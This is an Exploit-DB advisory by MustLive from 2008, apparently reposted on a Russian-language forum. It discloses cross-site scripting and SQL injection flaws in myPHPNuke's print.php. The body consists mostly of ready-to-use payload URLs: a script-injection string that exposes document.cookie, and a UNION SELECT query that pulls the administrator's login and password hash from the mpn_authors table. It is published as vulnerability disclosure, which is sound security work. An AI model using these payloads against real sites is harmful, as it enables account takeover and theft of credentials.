- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6338
- Проверка EDB
-
- Пройдено
- Автор
- MUSTLIVE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4089 cve-2008-4088
- Дата публикации
- 2008-08-31
Код:
############################################################
Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke
By MustLive (http://websecurity.com.ua)
Detailed information: http://websecurity.com.ua/2391/
Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.
XSS:
http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E
SQL Injection:
http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1
With this query you will receive login and password (hash) of administrator.
Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).
############################################################
# milw0rm.com [2008-08-31]- Источник
- www.exploit-db.com
